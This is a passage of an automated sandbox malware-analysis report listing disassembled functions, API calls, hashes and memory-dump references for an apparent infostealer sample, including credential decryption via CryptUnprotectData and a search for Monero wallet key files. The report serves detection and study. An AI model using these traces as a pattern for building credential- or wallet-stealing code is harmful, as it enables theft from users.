                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: I9~$rr{$sm=}$vw
                                • API String ID: 0-3258625590
                                • Opcode ID: 12470f9f04a78192ec7a0941ef467c75dc408ecd4c6f769937afb92d980438de
                                • Instruction ID: c45e37c81901a62fcb2c2e584a364fc1897958a6e66743504f46d208d86bff81
                                • Opcode Fuzzy Hash: 12470f9f04a78192ec7a0941ef467c75dc408ecd4c6f769937afb92d980438de
                                • Instruction Fuzzy Hash: 615259F3A08204AFE3046E2DEC8577AFBD9EF94360F2A453DEAC4C7744E57598058692
                                Function 00503720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                Download Yara Rule
                                APIs
                                • CoCreateInstance.COMBASE(0050E118,00000000,00000001,0050E108,00000000), ref: 00503758
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 005037B0
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharCreateInstanceMultiWide
                                • String ID:
                                • API String ID: 123533781-0
                                • Opcode ID: eb8ce42cf297949675eb0c026b713051f6e2a5788a674126358aaca389979887
                                • Instruction ID: 988e730feba0d27ddb82ee3543c66f1c4a6911a667abb190a25704c742d24169
                                • Opcode Fuzzy Hash: eb8ce42cf297949675eb0c026b713051f6e2a5788a674126358aaca389979887
                                • Instruction Fuzzy Hash: DE41EC71A40A189FDB24DB54CC95B9BB7B5BF48702F5081D8E608E72D0E7716E85CF50
                                Function 004F9B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004F9B84
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 004F9BA3
                                • LocalFree.KERNEL32(?), ref: 004F9BD3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$AllocCryptDataFreeUnprotect
                                • String ID:
                                • API String ID: 2068576380-0
                                • Opcode ID: 839a415059a3eb7ec3dfd13f79034a9c3b38cd1ddfa10d016790ba9564a8e601
                                • Instruction ID: 75cdd3926e5456136ef0e9b38e05697b2d0038f6927fcf416427d9ea3ef3b3f1
                                • Opcode Fuzzy Hash: 839a415059a3eb7ec3dfd13f79034a9c3b38cd1ddfa10d016790ba9564a8e601
                                • Instruction Fuzzy Hash: 25110CB4A00209EFDB04DFA4D985EAE77B5FF88301F108569E915A7350D774AE10CF61
                                Function 008BCCE6 Relevance: 4.4, Strings: 3, Instructions: 678COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 4xx$9Si$;;o
                                • API String ID: 0-3926094218
                                • Opcode ID: aacc9a527e32f30971218a64ebea836d4b2829a96a5faba2e87a500c4d8e4cb2
                                • Instruction ID: 3e2187ad9fbe78991e7a40e6e467ab0ae5b710b3b94cb6b115e52e4b5ebb3482
                                • Opcode Fuzzy Hash: aacc9a527e32f30971218a64ebea836d4b2829a96a5faba2e87a500c4d8e4cb2
                                • Instruction Fuzzy Hash: D81228F3A082009FE704AE2DEC8576ABBDAEBD4720F1A853DE6C4D7344E53598058797
                                Function 008BDD05 Relevance: 4.1, Strings: 2, Instructions: 1624COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: <*^$j{
                                • API String ID: 0-19929208
                                • Opcode ID: efc442492b60239f380233a04df0a66112e666908b0961fc2647ee9da904fc93
                                • Instruction ID: fed23d1266e9083e37858b983b91163eadde8995b3039569405abf09525abc3e
                                • Opcode Fuzzy Hash: efc442492b60239f380233a04df0a66112e666908b0961fc2647ee9da904fc93
                                • Instruction Fuzzy Hash: D8B2E7F360C204AFE708AE2DEC8567AB7E9EF94320F16453DE6C5C3744EA3598058697
                                Function 008B2553 Relevance: 2.6, Strings: 1, Instructions: 1304COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: bw{}
                                • API String ID: 0-61486077
                                • Opcode ID: efc0a2a6b928bef3fb8a41e71a92fae694fa08a66b84eb0ebcd00c5d9aa2c192
                                • Instruction ID: 3964aeb77f6ffa88c99ecbfb6d4d21be1a924da963fd428b4a1bf00bd16253af
                                • Opcode Fuzzy Hash: efc0a2a6b928bef3fb8a41e71a92fae694fa08a66b84eb0ebcd00c5d9aa2c192
                                • Instruction Fuzzy Hash: F09209F3A0C2049FE3046E2DEC8567AF7E5EF94720F1A893DEAC5C3744E63598058696
                                Function 004FF68A Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                  • Part of subcall function 0050A920: lstrcpy.KERNEL32(00000000,?), ref: 0050A972
                                  • Part of subcall function 0050A920: lstrcat.KERNEL32(00000000), ref: 0050A982
                                  • Part of subcall function 0050A9B0: lstrlen.KERNEL32(?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 0050A9C5
                                  • Part of subcall function 0050A9B0: lstrcpy.KERNEL32(00000000), ref: 0050AA04
                                  • Part of subcall function 0050A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0050AA12
                                  • Part of subcall function 0050A8A0: lstrcpy.KERNEL32(?,00510E17), ref: 0050A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,005115B8,00510D96), ref: 004FF71E
                                • StrCmpCA.SHLWAPI(?,005115BC), ref: 004FF76F
                                • StrCmpCA.SHLWAPI(?,005115C0), ref: 004FF785
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 004FFAB1
                                • FindClose.KERNEL32(000000FF), ref: 004FFAC3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID:
                                • API String ID: 3334442632-0
                                • Opcode ID: 03346336898d7fd02173019d7da5bfbb6c38d6decdd15793050de163f285a64b
                                • Instruction ID: 776d00acc2d1a53c1556232a0d7a74744868af3cff6c7c2609c4a89626e47ae0
                                • Opcode Fuzzy Hash: 03346336898d7fd02173019d7da5bfbb6c38d6decdd15793050de163f285a64b
                                • Instruction Fuzzy Hash: 4E11577180064EABDB14FB70DC59EED7B78BF50300F5086AAA51A564D2EF342B4ACB52
                                Function 007C4E1B Relevance: 1.4, Strings: 1, Instructions: 180COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ixv$
                                • API String ID: 0-2028889308
                                • Opcode ID: 401acf7d5fb588d4ea7aeaf94c7e864f8cb27a28fb0cda1148a39fce39dcde23
                                • Instruction ID: cceff30dccee5413d8a839dd970fa92ef4919fa2c5cbb1d895c910e91776862b
                                • Opcode Fuzzy Hash: 401acf7d5fb588d4ea7aeaf94c7e864f8cb27a28fb0cda1148a39fce39dcde23
                                • Instruction Fuzzy Hash: B55128F3B086045BE3185D6DEC8177AB3D6EBC4320F1AC23DEA8597784EC7A58054195
                                Function 0098F5E9 Relevance: .2, Instructions: 230COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 825cdc6fccd06d50b4a8585fab0e8c9702d7ddb71e5aeced2edc31fb78bd518f
                                • Instruction ID: fc3ba9aa0468bd69bda4014ce053e860ef557f3fb425018bef5fd5a36c19c7c4
                                • Opcode Fuzzy Hash: 825cdc6fccd06d50b4a8585fab0e8c9702d7ddb71e5aeced2edc31fb78bd518f
                                • Instruction Fuzzy Hash: 9961B0B251C604DFE3097A18ECA177AB7E5EB54320F261E3EE68387350EA3958509787
                                Function 00781F83 Relevance: .2, Instructions: 226COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b240f8640c301a1905b053480c9f24ee75d1152774a7e7b8f328faa6ac90135c
                                • Instruction ID: 2d17e90056ff6abb3757f5cf550a82ac918ac53d958a1b9ed3ecdd9e7a90f0aa
                                • Opcode Fuzzy Hash: b240f8640c301a1905b053480c9f24ee75d1152774a7e7b8f328faa6ac90135c
                                • Instruction Fuzzy Hash: 856128B3A082049FE304AE39DD4577AFBDADFC4320F16893EEA84C7784E93558458796
                                Function 007D5A7E Relevance: .2, Instructions: 199COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 52072a0922a5c2bf3bea7f93a85580848ea8e7151ba165b5a7d7d49a125441f3
                                • Instruction ID: c4c79261735de8b92236a7d499a3d1a7449423a9999104e6d50fad2a28a79168
                                • Opcode Fuzzy Hash: 52072a0922a5c2bf3bea7f93a85580848ea8e7151ba165b5a7d7d49a125441f3
                                • Instruction Fuzzy Hash: EE519BF3A082105FE7046E2DEC5177BB7EADBD4220F2A813DE9C893344F9355C024296
                                Function 009AB5DB Relevance: .2, Instructions: 177COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
